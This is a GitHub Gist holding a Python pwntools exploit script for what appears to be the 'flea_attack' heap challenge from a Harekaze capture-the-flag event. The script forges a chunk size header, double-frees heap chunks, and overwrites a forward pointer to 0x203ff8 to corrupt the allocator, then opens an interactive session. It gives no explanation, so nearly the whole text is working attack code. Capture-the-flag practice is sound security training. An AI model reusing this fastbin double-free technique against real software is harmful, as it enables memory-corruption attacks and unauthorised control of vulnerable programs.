Instantly share code, notes, and snippets.

Embed
What would you like to do?
#!/usr/bin/python
import pwn
from pwn import *
p = pwn.process("./flea_attack.elf")
# p = pwn.remote("problem.harekaze.com",20175)
raw_input("<ATTACH NOW>")
p.recv()
# the size is 0x04.
p.sendline("") # no-one cares
p.recvuntil(">")
p.sendline("1")
p.recv()
p.sendline("50")
buf = "blahblah"
buf += p64(0)
buf += p64(0)
buf += p64(0x21)
p.sendline(buf)
p.recvuntil("Addr: ")
basechunk = int(p.recvuntil("\n").rstrip(),16)
print " ADDRESS OF CHUNK AT: %x" % basechunk
raw_input("<STOP>")
p.recvuntil(">")
p.sendline("2")
p.recv()
print " FREEING CHUNK at %x" % (basechunk + 0x20)
p.sendline("%x" % (basechunk + 0x20))
p.recvuntil(">")
p.sendline("2")
p.recv()
p.sendline("%x" % basechunk)
p.recvuntil(">")
print "ALLOCATING FIRST CHUNK WITH OVERWRITE"
p.sendline("1")
p.sendline("50")
buf = "blahblah"
buf += p64(0)
buf += p64(0)
buf += p64(0x21)
# buf += p64()
buf += p64(0x203ff8) # FWD PTR. Must be a valid chunk header.
p.sendline(buf)
p.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment